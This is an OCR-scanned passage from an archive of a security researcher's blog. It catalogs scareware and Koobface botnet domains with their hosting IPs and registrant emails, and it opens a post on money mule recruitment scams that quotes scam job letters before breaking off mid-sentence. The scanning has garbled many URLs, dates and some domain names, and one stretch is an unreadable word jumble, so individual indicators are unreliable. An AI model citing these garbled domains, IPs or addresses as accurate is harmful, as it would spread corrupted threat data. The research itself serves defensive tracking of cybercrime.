checklatestversion .com/?b=312s - 109.232.225.75. 

The most recent samples ( Wednesday, February 24, 2010) 
phone back to 

shifustserver.com/download/winlogo.bmp 

- 94.228.208.57 - Email: viinzer@hotmail.com and version- 
upgrade. com/?b=312sl2 - 89.248.168.21. Parked on the 
same IP are also checklatestversion.com and 
fastwinupdates.com. 
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Parked on the same IPs are more scareware domains part of 
the portfolio: 


interlantivirus.com - 87.98.130.232- Email: 
test@now.net.cn 

virus-scan-d.com - 87.98.130.232 - Email: test@now.net.cn 

bl9-virus-scanner.com - 87.98.130.232 - Email: 
test@now.net.cn 

intera-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

interc-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

interd-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

intere-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

inter-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

interlantivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

195.5.161.107/psxl/?vih = = RAND0M _STRINGS - no 
domain name 

91.212.132.241 /psxl/?vih = = RANDOM STRINGS 
195.5.161.105 /psxl/?vih = = RANDOM STRINGS 
non-antivirus-scan .com - Email: test@now.net.cn 
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zin-antivirus-scan .com - Email: test@now.net.cn 



nextgen-scannert .com - Email: test@now.net.cn 

protectionl5scan .com - Email: test@now.net.cn 

nitro-antispyware .com - Email: test@now.net.cn 

z2-antispyware .com - Email: test@now.net.cn 

spy-detectore .com - Email: admin@clossingt.com 

dis7-antivirus .com - Email: admin@vertigosmart.com 

v2comp-scanner .com - Email: admin@vertigosmart.com 

new-av-scannere .com - Email: missbarlingmail@aol.com 

smartvirus-scan6 .com - Email: info@terranova.com 

spywaremaxscan4 .com - Email: out@trialzoom.com 

super6antispyware .com - Email: mail@ordercom.com 

spyware-max-scan3 .com - Email: out@trialzoom.com 

max-antivirus-security5 .com - Email: 
mail@dynadoter.com 

winterdiscounts5 .com - Email: mail@haselbladtour.com 
11-antivirus .com - Email: call555call@live.com 
1-antivirus .com - Email: call555call@live.com 
lm-online-scanner .com - Email: stellar2@yahoo.com 
2m-online-scanner .com - Email: stellar2@yahoo.com 
2pro-antispyware .com - Email: mail@yahoo.com 



3pro-antispyware .com - Email: mail@yahoo.com 

6- antivirus .com - Email: call555call@live.com 

7- antivirus .com - Email: call555call@live.com 
9-antivirus .com - Email: call555call@live.com 
aO-online-scanner .com - Email: stellar2@yahoo.com 
a9-online-scanner .com - Email: stellar2@yahoo.com 
aa-antivirus .com - Email: call555call@live.com 
aa-online-scanner .com - Email: call555call@live.com 
ab-antivirus .com - Email: call555call@live.com 
ac-antivirus .com - Email: call555call@live.com 
ad-antivirus .com - Email: call555call@live.com 
advl-system-scanner .com - Email: JayRKibbe@live.com 
adv2-system-scanner .com - Email: JayRKibbe@live.com 
ae-antivirus .com - Email: call555call@live.com 
antivirus-expert-a .com - Email: 900ekony@live.com 
antivirus-expert-i .com - Email: 900ekony@live.com 
antivirus-expert-r .com - Email: 900ekony@live.com 
antivirus-expert-y .com - Email: 900ekony@live.com 
antivirussystemscanl .com - Email: 900ekony@live.com 
antivirussystemscana .com - Email: 900ekony@live.com 



army-antispywarea .com - Email: beliec99@yahoo.com 
army-antispywarei .com - Email: beliec99@yahoo.com 
army-antispywarel .com - Email: beliec99@yahoo.com 
army-antispywarep .com - Email: beliec99@yahoo.com 
army-antivirusa .com - Email: beliec99@yahoo.com 
army-antivirusd .com - Email: beliec99@yahoo.com 
army-antivirust .com - Email: beliec99@yahoo.com 
army-antivirusv .com - Email: beliec99@yahoo.com 
army-antivirusy .com - Email: beliec99@yahoo.com 
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bl-online-scanner .com - Email: stellar2@yahoo.com 

best-antiviruskO .com 

bestpd-virusscanner .com - Email: 
SusanCWagner@yahoo.com 

bestpr-virusscanner .com - Email: 
SusanCWagner@yahoo.com 

crystal-antimalware .com - Email: mail@vertigocats.com 
crystal-antivirus .com - Email: mail@vertigocats.com 
crystal-pro-scan .com - Email: mail@vertigocats.com 
crystal-pro-scanner .com - Email: mail@vertigocats.com 
crystal-spyscanner .com - Email: mail@vertigocats.com 



crystal-threatscanner .com - Email: 
mail@vertigocats.com 

crystal-virusscanner .com - Email: mail@vertigocats.com 

extra-spyware-defencea .com - Email: fabula8@live.com 

extra-spyware-defenceb .com - Email: fabula8@live.com 

malware-a-scan .com - Email: mail@bristonnews.com 

malware-b-scan .com - Email: mail@bristonnews.com 

malware-c-scan .com - Email: mail@bristonnews.com 

malware-d-scan .com - Email: mail@bristonnews.com 

malware-t-scan .com - Email: mail@bristonnews.com 

mega-antispywarea .com - Email: fabula8@live.com 

mega-antispywareb .com - Email: fabula8@live.com 

mm-online-scanner .com - Email: stellar2@yahoo.com 

my-computer-antivirusa .com - Email: 
dillinzerl@yahoo.com 

my-computer-antivirusb .com - Email: 
dillinzerl@yahoo.com 

my-computer-antiviruse .com - Email: 
dillinzerl@yahoo.com 

my-computer-antivirusq .com - Email: 
dillinzerl@yahoo.com 

my-computer-antivirusw .com - Email: 
dillinzerl@yahoo.com 



my-computer-scanc .com - Email: 
cl i ntommail2@yahoo.com 

my-computer-scane .com - Email: 
clintommail2@yahoo.com 

my-computer-scanl .com - Email: 
clintommail2@yahoo.com 

my-computer-scannera .com - Email: 
clintommail2@yahoo.com 

my-computer-scannerl .com - Email: 
clintommail2@yahoo.com 

my-computer-scannerm .com - Email: 
clintommail2@yahoo.com 

my-computer-scannern .com - Email: 
clintommail2@yahoo.com 

my-computer-scannerv .com - Email: 
clintommail2@yahoo.com 

my-computer-scanw .com - Email: 
clintommail2@yahoo.com 

my-pc-online-scanm .com - Email: dillinzerl@yahoo.com 
my-pc-online-scann .com - Email: dillinzerl@yahoo.com 
my-pc-online-scanr .com - Email: dillinzerl@yahoo.com 
my-pc-online-scanv .com - Email: dillinzerl@yahoo.com 
nl-system-scanner .com - Email: JayRKibbe@live.com 
n2-system-scanner .com - Email: JayRKibbe@live.com 



nasa-antivirusl .com - Email: call555call@live.com 
nasa-antivirus3 .com - Email: call555call@live.com 
nasa-antivirusa .com - Email: call555call@live.com 
nasa-antivirusb .com - Email: call555call@live.com 
nasa-antiviruso .com - Email: call555call@live.com 
pcl-system-scanner .com - Email: JayRKibbe@live.com 
pc2-system-scanner .com - Email: JayRKibbe@live.com 
proO-antivirus .com - Email: mail@yahoo.com 
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proO-system-scanner .com - Email: JayRKibbe@live.com 

prol-system-scanner .com - Email: JayRKibbe@live.com 

pro2-antivirus .com - Email: mail@yahoo.com 

pro4-antivirus .com - Email: mail@yahoo.com 

pro6-antivirus .com - Email: mail@yahoo.com 

pro8-antivirus .com - Email: mail@yahoo.com 

remote-antispywarec .com - Email: 
teresa2mail.me@live.com 

remote-antispywared .com - Email: 
teresa2mail.me@live.com 




remote-antispywaree .com - Email: 
teresa2mail.me@live.com 

remote-antispywarey .com - Email: 
teresa2mail.me@live.com 

remote-pcl-scanner .com - Email: 
teresa2mail.me@live.com 

remote-pc-scannera .com - Email: 
teresa2mail.me@live.com 

remote-pc-scannerr .com - Email: 
teresa2mail.me@live.com 

remote-pc-scannerv .com - Email: 
teresa2mail.me@live.com 

remote-pc-scannery .com - Email: 
teresa2mail.me@live.com 

scan3antispyware .com - Email: o@mozzilastuf.com 
scan6antispyware .com - Email: o@mozzilastuf.com 
scan8antispyware .com - Email: o@mozzilastuf.com 
scan-antispywarea .com - Email: o@mozzilastuf.com 
scan-antispywarec .com - Email: o@mozzilastuf.com 
scan-antispywared .com - Email: o@mozzilastuf.com 
scan-antispywarez .com - Email: o@mozzilastuf.com 
spyware-01-scanner .com - Email: mail@bristonnews.com 
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spyware-03-scanner .com - Email: mail@bristonnews.com 

spyware-05-scanner .com - Email: mail@bristonnews.com 

spyware-06-scanner .com - Email: mail@bristonnews.com 

spyware-07-scanner .com - Email: mail@bristonnews.com 

stcanning-your-computerc .com - Email: 
mitra66@yahoo.com 

stcanning-your-computerd .com - Email: 
mitra66@yahoo.com 

stcanning-your-computerq .com - Email: 
mitra66@yahoo.com 

stcanning-your-computerr .com - Email: 
mitra66@yahoo.com 

stcanning-your-computert .com - Email: 
mitra66@yahoo.com 

stcanning-your-pca .com - Email: mitra66@yahoo.com 

stcanning-your-pcb .com - Email: mitra66@yahoo.com 

stcanning-your-pcc .com - Email: mitra66@yahoo.com 

stcanning-your-pcd .com - Email: mitra66@yahoo.com 

stcanning-your-pce .com - Email: mitra66@yahoo.com 

stealthvl-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv2-antispyware .com - Email: 
SteveLCartwright@yahoo.com 



stealthv7-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv8-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv9-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

verl-system-scanner .com - Email: JayRKibbe@live.com 

ver2-system-scanner .com - Email: JayRKibbe@live.com 

virus-al-scanner .com - Email: mail@bristonnews.com 

virus-al-scanner .com - Email: mail@bristonnews.com 

virus-bl-scanner .com - Email: mail@bristonnews.com 

virus-bl-scanner .com - Email: mail@bristonnews.com 

virus-cl-scanner .com - Email: mail@bristonnews.com 

virus-cl-scanner .com - Email: mail@bristonnews.com 

virus-dl-scanner .com - Email: mail@bristonnews.com 

virus-dl-scanner .com - Email: mail@bristonnews.com 

virus-e2-scanner .com - Email: mail@bristonnews.com 

virus-e2-scanner .com - Email: mail@bristonnews.com 

windowsv5-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv6-antispyware .com - Email: 
SteveLCartwright@yahoo.com 



windowsv7-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv8-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv9-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

zO-online-scanner .com - Email: stellar2@yahoo.com 
zl-online-scanner .com - Email: stellar2@yahoo.com 
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Active scareware domains portfolio (blackhat SEO/Koobface 
pushed) parked at [24]212.150.164.190 - AS1680 - 

NV-ASN 013 NetVision Ltd : 

antispy-download .org - Email: 
robertsimonkroon@gmail.com 

scanner-virus-free .org - Email: 
robertsimonkroon@gmail.com 

tube-best-porn .org - Email: robertsimonkroon@gmail.com 

tube-sex-porn .org - Email: robertsimonkroon@gmail.com 

download-free-files .org - Email: 
robertsimonkroon@gmail.com 

tube-porn-best .org - Email: robertsimonkroon@gmail.com 
scan-your-pc-now .org - Email: michaeltycoon@gmail.com 


scanner-virus-free .com - Email: 
robertsi monkroon@gmail.com 

tube-sex-porn .com - Email: robertsimonkroon@gmail.com 

scanner-free-virus .com - Email: 
robertsimonkroon@gmail.com 

tube-porn-best .com - Email: 
robertsimonkroon@gmail.com 

antispy-download .info - Email: 
robertsimonkroon@gmail.com 

soft-download-free .info - Email: 
robertsimonkroon@gmail.com 
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scanner-virus-free .info - Email: 
robertsimonkroon@gmail.com 

scanner-free-virus .info - Email: 
robertsimonkroon@gmail.com 

scan-your-pc-now .info - Email: 
michaeltycoon@gmail.com 

adult-tube-free .net - Email: michaeltycoon@gmail.com 

scanner-virus-free .net - Email: 
robertsimonkroon@gmail.com 

tube-sex-porn .net - Email: robertsimonkroon@gmail.com 

download-free-files .net - Email: 
michaeltycoon@gmail.com 



scanner-free-virus .net - Email: 
robertsi monkroon@gmail.com 

tube-porn-best .net - Email: robertsimonkroon@gmail.com 

ekjsoft .eu - Email: robertsimonkroon@gmail.com 

antispy-download .biz - Email: 
robertsimonkroon@gmail.com 

soft-download-free .biz - Email: 
robertsimonkroon@gmail.com 

scanner-virus-free .biz - Email: 
robertsimonkroon@gmail.com 

free-malware-scan .biz - Email: 
robertsimonkroon@gmail.com 

tube-best-porn .biz - Email: robertsimonkroon@gmail.com 

tube-sex-porn .biz - Email: robertsimonkroon@gmail.com 

download-free-files .biz - Email: 
michaeltycoon@gmail.com 
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scanner-free-virus .biz - Email: 
robertsimonkroon@gmail.com 

download-free-soft .biz - Email: 
robertsimonkroon@gmail.com 

tube-porn-best .biz - Email: robertsimonkroon@gmail.com 
scan-your-pc-now .biz - Email: michaeltycoon@gmail.com 


porn-tube-sex .biz - Email: robertsimonkroon@gmail.com 

alrzsoft .in - Email: petrenko.kolia@yandex.ru 

antispy-download .biz - Email: 
robertsimonkroon@gmail.com 

cool-tube-porn .net - Email: robertsimonkroon@gmail.com 

cool-tube-porn .org - Email: robertsimonkroon@gmail.com 

download-free-now .net - Email: 
robertsimonkroon@gmail.com 

download-free-now .org - Email: 
robertsimonkroon@gmail.com 

download-free-soft .com - Email: 
robertsimonkroon@gmail.com 

download-free-soft .net - Email: 
robertsimonkroon@gmail.com 

download-scaner-free .com - Email: 
robertsimonkroon@gmail.com 

ekjsoft .eu 
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fdglsoft .in - Email: petrenko.kolia@yandex.ru 

free-virus-scanner .net - Email: 
robertsimonkroon@gmail.com 

kleqsoft .in - Email: petrenko.kolia@yandex.ru 


kltysoft .in - Email: petrenko.kolia@yandex.ru 

ktyjsoft .in - Email: petrenko.kolia@yandex.ru 

kyezsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrjsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrtsoft .in - Email: petrenko.kolia@yandex.ru 

mgtlsoft .in - Email: petrenko.kolia@yandex.ru 

porn-sex-tube .net - Email: robertsimonkroon@gmail.com 

porn-sex-tube .org - Email: robertsimonkroon@gmail.com 

scan-free-malware .net - Email: 
robertsimonkroon@gmail.com 

scan-free-malware .org - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .com - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .info - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .net - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .org - Email: 
robertsimonkroon@gmail.com 

tube-best-porn .biz - Email: robertsimonkroon@gmail.com 

tube-best-porn .com - Email: 
robertsimonkroon@gmail.com 



tube-best-porn .net - Email: robertsimonkroon@gmail.com 
tube-best-porn .org - Email: robertsimonkroon@gmail.com 
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tube-porn-sex .info - Email: robertsimonkroon@gmail.com 
tube-porn-sex .net - Email: robertsimonkroon@gmail.com 
tube-porn-sex .org - Email: robertsimonkroon@gmail.com 
What's so special about the 

robertsimonkroon@gmail.com email anyway? 

It's the fact that not only was 

[25]the email was once again used to register [26]scareware 
domains two times in July, 2009, but also, as pointed out in 
November 2009's "[27]Koobface Botnet's Scareware Business 
Model - Part Two", the same email was used to register the 
following download locations for scareware domains pushed 
by the Koobface botnet: 

0ni9ols3feu60 .cn - Email: robertsimonkroon@gmail.com 
6j5aq93iu7yv4 .cn - Email: robertsimonkroon@gmail.com 
mf6gy4lj79ny5 .cn - Email: robertsimonkroon@gmail.com 
84u9wb2hsh4p6 .cn - Email: robertsimonkroon@gmail.com 
6pj2h8rqkhfw7 .cn - Email: robertsimonkroon@gmail.com 
7cib5fzf462g8 .cn - Email: robertsimonkroon@gmail.com 
7bs5nfzfkp8q8 .cn - Email: robertsimonkroon@gmail.com 
kt4lwumfhjb7a .cn - Email: robertsimonkroon@gmail.com 



q2bf0fzvjb5ca .cn - Email: robertsimonkroon@gmail.com 

rncocnspr44va .cn - Email: robertsimonkroon@gmail.com 

tleayoft9226b .cn - Email: robertsimonkroon@gmail.com 

4go4i9n76ttwd .cn - Email: robertsimonkroon@gmail.com 

kzvi4iiutrlle .cn - Email: robertsimonkroon@gmail.com 

hxc7jitg7k57e .cn - Email: robertsimonkroon@gmail.com 

mfbj6pquvjv8e .cn - Email: robertsimonkroon@gmail.com 

mt3pvkfmpi7de .cn - Email: robertsimonkroon@gmail.com 

fb7pxcqyb45oe .cn - Email: robertsimonkroon@gmail.com 

fyivbrl3b0dyf.cn - Email: robertsimonkroon@gmail.com 

z6aiinvi94jgg .cn - Email: robertsimonkroon@gmail.com 

ue4x08f5myqdl .cn - Email: robertsimonkroon@gmail.com 

p7keflvui9fkl .cn - Email: robertsimonkroon@gmail.com 

gjpwsc5p7oe3m .cn - Email: robertsimonkroon@gmail.com 

fluqldfi3qkcm .cn - Email: robertsimonkroon@gmail.com 

7mxlz5jq0nt3o .cn - Email: robertsimonkroon@gmail.com 

3uxyctrlmiqeo .cn - Email: robertsimonkroon@gmail.com 

p0umob9k2g7mp .cn - Email: 
robertsimonkroon@gmail. com 

od32qjx6meqos .cn - Email: robertsimonkroon@gmail.com 



bnfdxhaelrgey .cn - Email: robertsimonkroon@gmail.com 

7zju2l82i2zhz .cn - Email: robertsimonkroon@gmail.com 

Stay tuned for a massive Koobface related activities 
update, analyzing the gang's multi-tasking 
throughout 

the entire January, 2010 - descriptive historical OS!NT 
offers long-term value in cross-checking for 
connections. 

Related Koobface gang/botnet research: 

[28] How the Koobface Gang Monetizes Mac OS X Traffic 

[29] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[30] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[31] Koobface Botnet Starts Serving Client-Side Exploits 

[32] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[33] Koobface Botnet's Scareware Business Model - Part Two 

[34] Koobface Botnet's Scareware Business Model - Part One 
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[35] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 


[36]New Koobface campaign spoofs Adobe's Flash updater 



[37] Social engineering tactics of the Koobface botnet 

[38] Koobface Botnet Dissected in a TrendMicro Report 

[39] Movement on the Koobface Front - Part Two 

[40] Movement on the Koobface Front 

[41] Koobface - Come Out, Come Out, Wherever You Are 

[42] Dissecting Koobface Worm's Twitter Campaign 

The Diverse Portfolio of Fake Security Software 
Series: 

[43] A Diverse Portfolio of Fake Security Software - Part 
Twenty Four 

[44] A Diverse Portfolio of Fake Security Software - Part 
Twenty Three 

[45] A Diverse Portfolio of Fake Security Software - Part 
Twenty Two 

[46] A Diverse Portfolio of Fake Security Software - Part 
Twenty One 

[47] A Diverse Portfolio of Fake Security Software - Part 
Twenty 

[48] A Diverse Portfolio of Fake Security Software - Part 
Nineteen 

[49] A Diverse Portfolio of Fake Security Software - Part 
Eighteen 

[50] A Diverse Portfolio of Fake Security Software - Part 
Seventeen 



[51 ]A Diverse Portfolio of Fake Security Software 
Sixteen 

[52] A Diverse Portfolio of Fake Security Software 

[53] A Diverse Portfolio of Fake Security Software 
Fourteen 

[54] A Diverse Portfolio of Fake Security Software 
Thirteen 

[55] A Diverse Portfolio of Fake Security Software 

[56] A Diverse Portfolio of Fake Security Software 

[57] A Diverse Portfolio of Fake Security Software 

[58] A Diverse Portfolio of Fake Security Software 


Part 

Part Fifteen 
Part 

Part 

Part Twelve 
Part Eleven 
Part Ten 
Part Nine 




[59] A Diverse Portfolio of Fake Security Software - Part Eight 

[60] A Diverse Portfolio of Fake Security Software - Part Seven 

[61] A Diverse Portfolio of Fake Security Software - Part Six 

[62] A Diverse Portfolio of Fake Security Software - Part Five 

[63] A Diverse Portfolio of Fake Security Software - Part Four 

[64] A Diverse Portfolio of Fake Security Software - Part Three 

[65] A Diverse Portfolio of Fake Security Software - Part Two 

[66] Diverse Portfolio of Fake Security Software 

This post has been reproduced from [67]Dancho Danchev's 
blog. Follow him [68Jon Twitter. 

1. http://blo a s.zdnet.com/securit v/? d=4297 

2. http://en.wikipedia.or a /wiki/O p portunitv cost 

3. 

http://www.virustotal.com/analisis/bl57a41bcaf22d404785e 

2e4a7e0d235c9c5d5088f687772498f6eef5283e65e-12651 

47897 

4. 

http://www.virustotal.com/analisis/8562070059a98634689e 

0a457a90b6cd93213efa595e6f33520ab233e5d6abll- 

12653 


08914 



















5. 


http://www.vi rustotal.com/analisis/8e4eld0382dda2c2f2ccc9 

ff9aab275b96fc91e978e6el901f81bd3e658cd9cf-12853 

33130 

6 . 

http://www.virustotal.com/analisis/3del601c9dd4fb69e079b 

9f451dad4bcc99b8566f95c9d6d88549262a32b5681-12653 

85013 

7. 

http://www.virustotal.com/analisis/60b03b5b451bb4fla6c4b 

e8c9997a806113c0832bfca04bedeea447699af6012-12654 

07256 

8 . 

http://www.virustotal.com/analisis/60b03b5b451bb4fla6c4b 

e8c9997a806113c0832bfca04bedeea447699af6012-12654 
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20621 

9. 

http://www.virustotal.com/analisis/c5a59b3ee6b4da2fa9f5cb 

51bdf27dd59a560b3e857b6c2142e0bl546c66fec4-12654 

76116 

10 . 

http://www.virustotal.com/analisis/6ee2be84c8df4622de09f7 



















53b0032e4eb88ab7b862eb2dc98e3b924d3d513618-12655 


06080 

11 . 

http://www.vi rustotal.com/analisis/5122cef5ff65e00212c29c 

9d6b61a73d2cdc7004e76a75ebec44469464fceeb0-12655 

78417 

12 . 

http://www.virustotal.com/analisis/47351336cc4408d20d243 

1330a409b74369bebfd40b926eb23e4f4a65d9f7697-12656 

52899 

13. 

http://www.virustotal.com/analisis/6640370dbabddlf206931 

588eafd9172566d0047b2c2857353148c70eba61046-12658 

23028 

14. 

http://www.virustotal.com/analisis/3e289a5c06258aca2a21e 

6cb9bff670d21345250d4e7efde98f3769al7dfa6ef-12658 

45020 

15. 

http://www.virustotal.com/analisis/d893e69082e5553d6881 

6afc75990d2bcfc56fb0455f0689caac380dbb0720ce-12659 

08933 

16. 

http://www.virustotal.com/analisis/99c63f4333fe748b59e040 

ba450d943da9836b5d3flb3612683d9fcbec5b75fd-12659 
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17. 

http://www.vi rustotal.com/analisis/47af520feea8efeec59325f 

7cdedl6af42b2cb459c34ddel21098e222332dblf-12660 

00454 

18. 

http://www.virustotal.com/analisis/5a4a50d2e4al023a8b80f 

2fb2bb68b31ebbf71b6a5127018e9656da6a0cl0cfd-12660 

17625 

19. 

http://www.virustotal.com/analisis/a7523cd6a95be9efbf7d2a 

225 Iadeb0ebe032680f4323cc09065c740bbd 18166-12665 

20546 

20 . 

http://www.virustotal.com/analisis/ab049035d0ca70b6679a5 

ddl38132e9bal95fcel3931ff44dl4259670423731f-12667 

97102 

21 . 

http://www.virustotal.com/analisis/3d6c89fl93b31c41c4083 

00ebe006fd79239a401bcb70fe907605bb2af8c6de4-12668 

50664 

22 . 

http://www.virustotal.com/analisis/cff397f260e39d5fa32662 

6eb7acde49938ed21clb52ac6ec70594595060e470-12669 


69210 





















23. 

http://www.vi rustotal.com/analisis/7feb701fce09c541669ee6 

ff9al696832459e4073119eeed76c82266fcdadbl5-12670 

37682 


24. http://whois.domaintools.com/212.150.164.190 

25. http://ddanchev.blo as pot.com/2009/07/diverse-portfolio- 
of-fake-securitv.html 

26. http://ddanchev.blo as pot.com/2009/07/diverse-portfolio- 
of-fake-securitv_27.html 

27. http://ddanchev.blo as pot.com/20Q9/ll/koobface- 
botnets-scareware-business.html 


28. http://ddanchev.blo as pot.com/2010/Q2/how-koobface- 
a an a -monetizes-mac-os-x.html 

29. http://ddanchev.blo as pot.com/20Q9/12/koobface- a an a- 
wishes-mdustrv-ha pp v.html 

30. http://ddanchev.blo as pot.com/20Q9/12/koobface- 
friendlv-riccom-ltd-as29550.html 

31. http://ddanchev.blo as pot.com/20Q9/ll/koobface-botnet- 
starts-servin a -ciient.html 

32. http://ddanchev.blo as pot.com/20Q9/ll/massive- 
scareware-servin a -blackhat-seo.html 

33. http://ddanchev.blo as pot.com/20Q9/ll/koobface- 
botnets-scareware-business.html 


34. http://ddanchev.blo as pot.com/2009/Q9/koobface- 
botnets-scareware-business.html 













































35. http://ddanchev.blo as pot.com/20Q9/10/koobface-botnet- 
redirects-facebooks-ip.html 

36. http://blo a s.zdnet.com/securit v/? p=4594 

37. http://content.zdnet.com/2346-12691 22-352597.html 

38. http://ddanchev.blo as pot.com/20Q9/10/koobface-botnet- 
dissected-in-trendmicro.html 


39. http://ddanchev.blo as pot.com/2009/Q8/movement-on- 
koobface-front-part-two.html 

40. http://ddanchev.blo as pot.com/2009/08/movennent-on- 
koobface-front.html 


41. http://ddanchev.blo as pot.com/2009/Q7/koobface-come- 
out-come-out-wherever-vou.html 

42. http://ddanchev.blo as pot.com/2009/Q7/dissectin a- 
koobface-worms-twitter.html 
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43. http://ddanchev.blo as pot.com/2009/12/diverse-PortfQlio- 
of-fake-securiitv.html 

44. http://ddanchev.blo as pot.com/2009/07/diverse-portfolio- 
of-f a ke-sec u hi tv_2 7.html 

45. http://ddanchev.blo as pot.com/2009/07/diverse-PortfoliQ- 
of-fake-securitv.html 

46. http://ddanchev.blo as pot.com/2009/06/diverse-portfolio- 
of-fake-securitv.html 


47. http://ddanchev.blo as pot.com/2009/Q5/diverse-portfolio- 
of-fake-securitv.html 




















































48. http://ddanchev.blo as pot.com/2009/04/diverse-portfolio- 
offake-securitv_16.html 

49. http://ddanchev.blo as pot.com/2009/Q4/diverse-portfolio- 
of-fake-securitv.html 

50. http://ddanchev.blo as pot.com/2009/03/diverse-portfolio- 
of-fake-securitv_31.html 

51. http://ddanchev.blo as pot.com/2009/03/diverse-portfolio- 
of-fake-securitv.html 

52. http://ddanchev.blo as pot.com/2009/02/diverse-portfolio- 
of-fake-securitv.html 

53. http://ddanchev.blo as pot.com/2009/01/diverse-portfolio- 
of-fake-securitv.html 

54. http://ddanchev.blo as pot.com/2008/ll/diverse-portfoliQ- 
of-fake-securitv 12.html 

55. http://ddanchev.blo as pot.eom/2008/ll/diverse-portfolio- 
of-fake-securitv.html 

56. http://ddanchev.blo as pot.com/20Q8/10/diverse-portfolio- 
of-fake-securitv_28.html 

57. http://ddanchev.blo as pot.eom/2008/10/diverse-portfolio- 
of-fake-securitv_22.htmi 

58. http://ddanchev.blo as pot.com/20Q8/10/diverse-portfolio- 
of-fake-securitv 16.html 

59. http://ddanchev.blo as pot.com/2008/10/diverse-portfolio- 
of-fake-securitv.html 

60. http://ddanchev.blo as pot.com/2008/Q9/diverse-portfolio- 
of-fake-securitv_30.html 




































































61. http://ddanchev.blo as pot.com/2008/Q9/diverse-portfolio- 
of-fake-securitv_24.html 

62. http://ddanchev.blo as pot.com/2008/Q9/diverse-portfolio- 
of-fake-securitv.html 

63. http://ddanchev.blo as pot.com/2008/08/diverse-portfolio- 
of-fake-securitv_25.html 

64. http://ddanchev.blo as pot.com/2008/08/diverse-portfolio- 
of-fake-securitv 20.html 

65. http://ddanchev.blo as pot.com/2008/08/diverse-portfolio- 
of-fake-securitv.html 

66. http://ddanchev.blo as pot.com/2007/12/diverse-portfolio- 
of-fake-securitv.html 

67. http://ddanchev.blo as pot.com/ 

68. http://twitter.com/danchodanchev 
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23 0ecerroer 2000 
' CS&MTML ♦ Wordpress Sie 
Development 
22 Decemoer 2000 


Keeping Money Mule Recruiters on a Short Leash - 
Part Two (2010-02-09 20:17) 

With [l]money mule recruitment syndicates continuing to 
expand their [2]geographically diverse inventories of 

gullible mules, keeping their operations on a short leash is 
becoming a tradition. What the non-existent organizations 
profiled in this post have in common with the non-existent 
organizations profiled before, is the vendor of money 

mule recruitment creative, thanks to whose standardization 
of the recruitment process, everyone willing to invest a 
modest amount of money can start recruiting. 




Despite [3]the ongoing mix of [4]abusing legitimate 
infrastructure ( [5]Web 2.0 services, dedicated hosting within 
legitimate ISPs - [6]Tweet 1; [7]Tweet 2; [8]Tweet 3; [9]Tweet 
4; [lOJTweet 5; [llJTweet 6) and using purely malicious 
infrastructure, centralization is cybecrime operations is still 
an inseparable part of the cybercrime ecosystem. 

Case in point is [12]AS47560 - [13]VESTEH-NET-as Vesteh 
LLC, where the cybercriminals have not only chosen 

to host their money mule recruitment domain portfolio, but 
also, the actual Zeus crimeware command and control 

servers. Pretty convenient indeed, however a minimalistic 
OPSEC attitude leading to increased exposure. 

The newly introduced money mule recruitment domains, rely 
on the same DIY web interface, and the same 

"payment processing agent" agreement seen in previous 
campaigns. What's naturally changing are the web page 
layouts combined with a new description of the non-existent 
company. Here's a sample from the currently active ones: 
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"Welcome to the world of Outsourcing. Never has a 
phenomenon been so all encompassing and empowering like 
outsourcing. Transcending beyond an industry's vertical 
segments, outsourcing has become the "by default" strategy 
for all profit conscious organizations that struggle to retain 
their winning streak and high profitability. Today's scenario in 
the business world is more competitive than what it was in 
the past. There is a growing realization that wisdom lies in 
consolidating the core competency functions and 
outsourcing the supplement. We are an online 

services marketplace in USA and Australia. Our goat is to 
empower businesses with the absolute freedom to choose 
where to outsource their business needs to maximize their 




















competitive advantage. We believe that "money saved due 
to outsourcing can be effectively and successfully utilized to 
focus more on strategic and core businesses functions". 

The fact that money mule recruiters aggregate contact 
details from career building web sites, isn't new - see 

"[14]Major career web sites hit by spammers attack". 

Here are the [15]sample letters emailed to a prospective 
money mule, which [16]spotted the scam and avoided it: 
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cjrtMki businesses 

company 



nr>S££i functions 


arrMtn 

.-^also 

Bennett 
Australia 


■ • world vL.„ 
servjce^Wm®_ working years 

Scott 


buyer! BOStOnF" 

mm Brian .communication 

advantage - " 

_ Alan cnief 



AVAlEABlIE^Eeeatiofi SUCCESS 

Manager service providers strata . A , 

m isinps<?r I t- outsourcing USA 

business p U ||-j outsource . serV i Ce 

‘ MOMENT _ 


C9JD P^titiVe ni^i investment I 

Gamer financial maximize I _ 

'ir—t Group higher online needs 


-Terry Taylor 
residents **v*m*rr. 

VlrvQpe 

erC|KU MQWfO 


(rorvuMW 


"After reviewing your resume online we have decided to 
propose you a Payment Processing Agent vacancy. 

My name is Sarah Forbes and I'm working at SUCCESS Group 
Inc. Our company is a well-known one. It was 

founded in the USA and deals mainly with recruitment of IT 
professionals. The job we offer is a part-time position with a 
flexible schedule. On average the working hours are 2-3 
hours a day (Monday through Friday). Our job 

requirements: Internet access and e-mail. Successful 
applicants are offered a probationary period (30 days). AH 
agents get a training and online support. We evaluate the 






employees at least one week prior to the end of their trial 
period. NOTE: During the probationary period termination 
can be recommended by the supervisor. 

The pay is $2,300 per month during the Trial Period + 8 % 
commission from each successfully handled pay¬ 
ment. Total income is about $4,500 per month. After the first 
30 days your base salary will be increased up 

